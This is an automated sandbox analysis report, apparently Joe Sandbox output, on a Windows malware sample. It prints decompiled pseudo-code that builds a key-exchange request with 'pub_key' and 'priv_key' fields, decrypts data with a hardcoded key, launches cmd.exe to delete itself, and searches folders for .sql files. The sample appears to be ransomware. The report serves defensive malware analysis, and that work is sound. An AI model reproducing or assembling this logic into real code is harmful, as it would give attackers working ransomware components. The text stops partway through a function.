API String ID: 1320946285-0
Opcode ID: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
Instruction ID: 1b19d15e4aeeb9909d6bd86e0db19be6c339a400cc2da824b43fea8bc324f338
Opcode Fuzzy Hash: 1f204cbbbf4b91cb41731de12bafb510547bb58fbcebeb620ebc01891cafb445
Instruction Fuzzy Hash: 56A011302082080AE0803BA2A80AB0A320C0B00A02F800030A208A80C208A8280080AE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405750 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00405750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				int _t210;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_t210 = __edx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E004039B0( &_v404);
				E00406D90( &_v492);
				_t255 = E00406BA0( &_v492);
				_t7 = _a8 + _t210 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E004069A0( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.1");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0x410128]");
					_v448 = _t233;
					_t234 =  *0x410134; // 0x6a73
					_v444 = _t234;
					_t235 =  *0x410136; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E00408B30( &_v295, 0, 0xff);
					E00405C40( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E00405CF0( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E00405370(_t283,  &_v508, 1);
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E00407720( &_v408);
				return _t268;
			}

0x0040575f
0x00405760
0x00405762
0x00405763
0x00405768
0x0040576c
0x0040576e
0x00405772
0x00405774
0x00405775
0x00405777
0x00405778
0x0040577a
0x0040577b
0x0040577d
0x0040577e
0x00405783
0x00405785
0x00405786
0x0040578f
0x00405798
0x004057a9
0x004057b4
0x004057ba
0x004057c0
0x004057c6
0x004057c8
0x004057cc
0x004057d3
0x004057dc
0x004057f1
0x004057f5
0x004057e2
0x004057e2
0x004057e5
0x004057e9
0x004057ed
0x004057ed
0x004057ff
0x00405806
0x0040581f
0x0040581f
0x00405821
0x00405808
0x00405808
0x0040580d
0x00000000
0x0040580f
0x0040580f
0x00405811
0x00405815
0x00405817
0x00405819
0x00405819
0x0040580d
0x0040582a
0x0040582e
0x0040583d
0x0040583f
0x0040583f
0x00405845
0x00000000
0x0040584b
0x0040584b
0x00405857
0x0040586a
0x0040586f
0x00405883
0x0040588c
0x004058a0
0x004058a5
0x004058af
0x004058b3
0x004058b7
0x004058bf
0x004058c1
0x004058c5
0x004058c8
0x004058df
0x004058ce
0x004058d1
0x004058d5
0x004058d9
0x004058d9
0x004058ea
0x004058f0
0x004058fa
0x004058fa
0x00405906
0x0040590c
0x0040590e
0x00405912
0x00405916
0x00405920
0x00405920
0x00405925
0x0040592b
0x0040592e
0x0040592e
0x00405933
0x00405934
0x00405936
0x0040593a
0x0040593e
0x0040593e
0x00405943
0x00405949
0x0040594b
0x0040594f
0x00405953
0x00405953
0x00405958
0x0040595e
0x00405961
0x00405961
0x00405966
0x00405967
0x00405969
0x0040596d
0x00405953
0x00405971
0x00405981
0x00405990
0x00405994
0x0040599f
0x004059a2
0x004059c0
0x004059cc
0x004059cf
0x004059f1
0x004059fd
0x00405a17
0x00405a27
0x00405a29
0x00405a2f
0x00405a38
0x00405a46
0x00405a3e
0x00405a3e
0x00405a3e
0x00405a4e
0x00405a50
0x00405a56
0x00405a58
0x00405a67
0x00405a6b
0x00405a77
0x00405a7c
0x00405a85
0x00405a8b
0x00405a8f
0x00405a97
0x00405ab8
0x00405ac1
0x00405acf
0x00405ade
0x00405ae2
0x00405afe
0x00405b00
0x00405b00
0x00405b10
0x00405b10
0x00405b1d
0x00405b23
0x00405b23
0x00405b26
0x00405b2c
0x00405b36
0x00405b36
0x00405b2e
0x00405b2e
0x00405b34
0x00000000
0x00000000
0x00405b34
0x00405b3f
0x00405b45
0x00405b47
0x00405b4b
0x00405b50
0x00405b50
0x00405b55
0x00405b5b
0x00405b5e
0x00405b5e
0x00405b63
0x00405b64
0x00405b66
0x00405b6a
0x00405b50
0x00405b6e
0x00405b84
0x00405b90
0x00405b9a
0x00405ba4
0x00405bd7
0x00405bdd
0x00405be2
0x00405be2
0x00405bf6
0x00405c03
0x00405c10
0x00405c1a
0x00405c1a
0x00405ba6
0x00405bb7
0x00405bc4
0x00405bd1
0x00405bd3
0x00405bd3
0x00405ba4
0x00405c2a
0x00405c30
0x00405c3d

APIs

Part of subcall function 004039B0: GetProcessHeap.KERNEL32(?,?,00404587,00000000,?,00000000), ref: 00403A4C

Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00406DB7
Part of subcall function 00406D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00406DC8
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00406DE6
Part of subcall function 00406D90: GetComputerNameW.KERNEL32 ref: 00406DF0
Part of subcall function 00406D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00406E10
Part of subcall function 00406D90: wsprintfW.USER32 ref: 00406E51
Part of subcall function 00406D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00406E6E
Part of subcall function 00406D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00406E92
Part of subcall function 00406D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00406EB6
Part of subcall function 00406D90: RegCloseKey.ADVAPI32(00000000), ref: 00406ED2

Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
Part of subcall function 00406BA0: lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
Part of subcall function 00406BA0: lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC

VirtualAlloc.KERNEL32(00000000,00000008,00003000,00000040,00000001,00000000,00000001,00000001,00000000,00000001), ref: 004057C0
CryptBinaryToStringA.CRYPT32(00000000,00000000,40000001,00000000,?), ref: 0040586A
CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00405883
lstrlenA.KERNEL32(00000000), ref: 0040588C
lstrlenA.KERNEL32(?), ref: 00405894
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 004058A5
lstrlenA.KERNEL32(?), ref: 004058BF
lstrlenA.KERNEL32(00000000), ref: 004058E8
lstrlenA.KERNEL32(?), ref: 00405908
lstrlenA.KERNEL32(?), ref: 00405934
lstrlenA.KERNEL32(00000000), ref: 00405945
lstrlenA.KERNEL32(00000000), ref: 00405967
lstrcatW.KERNEL32(?,action=call&), ref: 00405981
lstrlenW.KERNEL32(?), ref: 0040598A
lstrcatW.KERNEL32(?,&pub_key=), ref: 0040599F
lstrlenW.KERNEL32(?), ref: 004059A2
lstrlenA.KERNEL32(00000000), ref: 004059AB
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,74CB69A0,00000000), ref: 004059C0
lstrcatW.KERNEL32(?,&priv_key=), ref: 004059CC
lstrlenW.KERNEL32(?), ref: 004059CF
lstrlenA.KERNEL32(00000000), ref: 004059DC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,74CB69A0,00000000), ref: 004059F1
lstrcatW.KERNEL32(?,&version=2.1), ref: 004059FD
lstrlenW.KERNEL32(?), ref: 00405A09
VirtualAlloc.KERNEL32(00000000,-00000012,00003000,00000040), ref: 00405A1D
lstrlenW.KERNEL32(?), ref: 00405A2D
lstrlenW.KERNEL32(?), ref: 00405A4E
_memset.LIBCMT ref: 00405A97
lstrlenA.KERNEL32(?), ref: 00405AAA

Part of subcall function 00405C40: _memset.LIBCMT ref: 00405C6D

CryptBinaryToStringA.CRYPT32(?,-00000012,40000001,?,?), ref: 00405AF6
GetLastError.KERNEL32 ref: 00405B00
lstrlenA.KERNEL32(?), ref: 00405B07
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405B16
lstrlenA.KERNEL32(?), ref: 00405B21
lstrlenA.KERNEL32(?), ref: 00405B41
lstrlenA.KERNEL32(?), ref: 00405B64
lstrlenA.KERNEL32(00000000), ref: 00405B73
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000000), ref: 00405B84
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BB7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BC4
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BD1
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405BF6
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C03
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C10
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405C2A

Strings

#shasj, xrefs: 00405A50
&version=2.1, xrefs: 004059F7
&pub_key=, xrefs: 00405999
action=call&, xrefs: 0040597B
&priv_key=, xrefs: 004059C6

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$Free$lstrcat$BinaryByteCharCryptMultiStringWide$Name_memset$CloseComputerErrorHeapLastOpenProcessQueryUserValuewsprintf
String ID: #shasj$&priv_key=$&pub_key=$&version=2.1$action=call&
API String ID: 2781787645-879081296
Opcode ID: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
Instruction ID: 3a474d479e6cb3117948b119d777232bcba310bd2a7d749a27062e74eb6ba077
Opcode Fuzzy Hash: 42260e6ab3002364badc6e3d4333114a13f126ae31cbc07f3222118c6a6bf9c8
Instruction Fuzzy Hash: CEE18C71608301AFE710DF25CC85B6BBBE5EB88754F00492EF585A72A0D774AD05CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00405050 Relevance: 36.9, APIs: 19, Strings: 2, Instructions: 191
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405050(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				CHAR* _v12;
				int _v16;
				char _v18;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				void* _v36;
				CHAR** _v40;
				void* _v44;
				char _v299;
				char _v300;
				void* _v356;
				void* _v360;
				int _t55;
				int _t56;
				BYTE* _t57;
				int _t59;
				void* _t63;
				void* _t64;
				char _t65;
				void* _t77;
				signed int _t79;
				signed int _t81;
				int _t82;
				int _t85;
				char _t87;
				CHAR* _t95;
				int _t97;
				char* _t98;
				void* _t107;
				void* _t108;
				signed char _t109;
				short* _t111;
				WCHAR* _t116;
				CHAR* _t117;
				BYTE* _t124;
				WCHAR* _t125;
				WCHAR* _t126;
				void* _t127;
				long _t128;
				char* _t129;
				int _t130;
				void* _t131;
				CHAR* _t132;
				void* _t133;
				long _t134;
				char* _t135;

				_v40 = __edx;
				_v12 = __ecx;
				_t55 = lstrlenA(__ecx);
				_t107 = VirtualAlloc;
				_t56 = _t55 + 1;
				_v16 = _t56;
				_t4 = _t56 + 1; // 0x2
				_t128 = _t4;
				_t57 = VirtualAlloc(0, _t128, 0x3000, 0x40);
				_v44 = _t57;
				if(_t57 == 0 || _v16 >= _t128) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_t124 = _t57;
				}
				_t129 = 0;
				_t59 = CryptStringToBinaryA(_v12, 0, 1, _t124,  &_v16, 0, 0);
				_t144 = _t59;
				if(_t59 == 0) {
					GetLastError();
					goto L26;
				} else {
					_t63 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0x410128]");
					_t130 = _v16;
					_v24 = _t63;
					_t64 =  *0x410134; // 0x6a73
					_v20 = _t64;
					_t65 =  *0x410136; // 0x0
					_v18 = _t65;
					asm("movq [ebp-0x1c], xmm0");
					_v300 = 0;
					E00408B30( &_v299, 0, 0xff);
					E00405C40( &_v300,  &_v32, lstrlenA( &_v32));
					E00405CF0( &_v300, _t124, _t130);
					_t116 =  &_v32;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x1c], xmm0");
					E004033E0(_t116, _t144, _t124);
					if(_v32 != 0) {
						E00404FD0();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t107);
						_push(_t130);
						_push(_t124);
						_t125 = _t116;
						_t131 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v360 = _t131;
						GetModuleFileNameW(0, _t131, 0x200);
						_t108 = CreateFileW(_t131, 0x80000000, 1, 0, 3, 0x80, 0);
						_v356 = _t108;
						__eflags = _t108 - 0xffffffff;
						if(_t108 != 0xffffffff) {
							_t77 = CreateFileMappingW(_t108, 0, 8, 0, 0, 0);
							_v28 = _t77;
							__eflags = _t77;
							if(_t77 != 0) {
								_t79 = MapViewOfFile(_t77, 1, 0, 0, 0);
								_v16 = _t79;
								__eflags = _t79;
								if(_t79 != 0) {
									_t41 = _t79 + 0x4e; // 0x4e
									_t132 = _t41;
									_v12 = _t132;
									_t81 = lstrlenW(_t125);
									_t109 = 0;
									_t126 =  &(_t125[_t81]);
									_t82 = lstrlenA(_t132);
									__eflags = _t82 + _t82;
									if(_t82 + _t82 != 0) {
										_t117 = _t132;
										do {
											__eflags = _t109 & 0x00000001;
											if((_t109 & 0x00000001) != 0) {
												 *((char*)(_t126 + _t109)) = 0;
											} else {
												_t87 =  *_t132;
												_t132 =  &(_t132[1]);
												 *((char*)(_t126 + _t109)) = _t87;
											}
											_t109 = _t109 + 1;
											_t85 = lstrlenA(_t117);
											_t117 = _v12;
											__eflags = _t109 - _t85 + _t85;
										} while (_t109 < _t85 + _t85);
									}
									UnmapViewOfFile(_v16);
									_t108 = _v20;
									_t131 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t108);
						}
						return VirtualFree(_t131, 0, 0x8000);
					} else {
						_t127 = _v28;
						_v12 = 1;
						if(_t127 != 0) {
							_t97 = lstrlenA(_t127);
							_v8 = _t97;
							_t24 = _t97 + 1; // 0x1
							_t134 = _t24;
							_t98 = VirtualAlloc(0, _t134, 0x3000, 0x40);
							_v36 = _t98;
							if(_t98 == 0 || _v8 >= _t134) {
								_t135 = 0;
								__eflags = 0;
							} else {
								_t135 = _t98;
							}
							if(CryptStringToBinaryA(_t127, 0, 1, _t135,  &_v8, 0, 0) != 0) {
								_t111 = VirtualAlloc(0, 2 + _v8 * 2, 0x3000, 4);
								if(_t111 != 0) {
									if(MultiByteToWideChar(0xfde9, 0, _t135, 0xffffffff, _t111, _v8 + 1) <= 0) {
										GetLastError();
									} else {
										 *0x412b00 = _t111;
									}
								}
							}
							VirtualFree(_v36, 0, 0x8000);
						}
						_t33 =  &_v24; // 0x4054e4
						_t133 =  *_t33;
						if(_t133 != 0) {
							_t95 = VirtualAlloc(0, lstrlenA(_t133) + 1, 0x3000, 4);
							 *_v40 = _t95;
							if(_t95 != 0) {
								lstrcpyA(_t95, _t133);
							}
						}
						_t88 = GetProcessHeap;
						if(_t127 != 0) {
							HeapFree(GetProcessHeap(), 0, _t127);
							_t88 = GetProcessHeap;
						}
						if(_t133 != 0) {
							HeapFree( *_t88(), 0, _t133);
						}
						_t129 = _v12;
						L26:
						VirtualFree(_v44, 0, 0x8000);
						return _t129;
					}
				}
			}

APIs

lstrlenA.KERNEL32(?,00000001,?,?), ref: 00405065
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 00405082
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004050A5
_memset.LIBCMT ref: 004050F2
lstrlenA.KERNEL32(?), ref: 004050FE
lstrlenA.KERNEL32(?,00000000), ref: 00405152
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00405168
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0040518A
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004051A8
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000001), ref: 004051C0
GetLastError.KERNEL32 ref: 004051D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004051E8
lstrlenA.KERNEL32(T@,00003000,00000004,00000000), ref: 004051FD
VirtualAlloc.KERNEL32(00000000,00000001), ref: 00405207
lstrcpyA.KERNEL32(00000000,T@), ref: 00405214
HeapFree.KERNEL32(00000000), ref: 0040522F
HeapFree.KERNEL32(00000000), ref: 00405240
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0040524F
GetLastError.KERNEL32 ref: 0040525E

Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
Part of subcall function 00404FD0: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
Part of subcall function 00404FD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
Part of subcall function 00404FD0: wsprintfW.USER32 ref: 00405019
Part of subcall function 00404FD0: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
Part of subcall function 00404FD0: ExitProcess.KERNEL32 ref: 0040503B

Strings

#shasj, xrefs: 004050B3
T@, xrefs: 004051EE, 004051FC, 00405212, 0040523A

Memory Dump Source

Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_vkspii.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$Freelstrlen$BinaryCryptErrorHeapLastString$ByteCharExecuteExitFileModuleMultiNameProcessShellWide_memsetlstrcpywsprintf
String ID: #shasj$T@
API String ID: 463976167-3786297935
Opcode ID: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
Instruction ID: a9872d5510dab6a1258aa89b5c1af8b8eb6182ffb0005660de6a3b244a0720a6
Opcode Fuzzy Hash: 634f5961097015f30c8b0ac83ea798bb248f13a275b99a132a4a8292019a7bca
Instruction Fuzzy Hash: 54519471E01215ABEB209BA59D49BAF7BB8EF48710F100065FA05BA2D1DB749D01CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004064A0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 136
stringfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004064A0(WCHAR* __ecx) {
				void* _v8;
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				long _v24;
				struct _WIN32_FIND_DATAW _v620;
				int _t38;
				struct _SECURITY_ATTRIBUTES* _t40;
				int _t50;
				WCHAR* _t52;
				intOrPtr _t53;
				void* _t54;
				WCHAR* _t57;
				long _t64;
				WCHAR* _t66;
				void* _t67;

				_t66 = __ecx;
				_v16 = __ecx;
				_t52 =  &(_t66[lstrlenW(__ecx)]);
				_v20 = _t52;
				lstrcatW(_t66, "*");
				_v8 = FindFirstFileW(_t66,  &_v620);
				 *_t52 = 0;
				_t53 = 0;
				do {
					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
						goto L20;
					} else {
						lstrcatW(_t66,  &(_v620.cFileName));
						_t38 = lstrlenW(_t66);
						_t10 = _t38 - 1; // -1
						_t57 =  &(_t66[_t10]);
						if(_t38 == 0) {
							L18:
							_t53 = 0;
							goto L19;
						} else {
							while( *_t57 != 0x2e) {
								_t57 = _t57 - 2;
								_t38 = _t38 - 1;
								if(_t38 != 0) {
									continue;
								}
								break;
							}
							if(_t38 == 0) {
								goto L18;
							} else {
								_t40 = lstrcmpW(_t57, L".sql");
								if(_t40 != 0) {
									goto L18;
								} else {
									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
									_t64 = GetFileSize(_t54, 0);
									_v12 = 0;
									if(_t64 < 0x40000000) {
										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
										if(_t67 != 0) {
											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E00407C10(_t67, "*******************") != 0) {
												_t50 = lstrlenA("*******************");
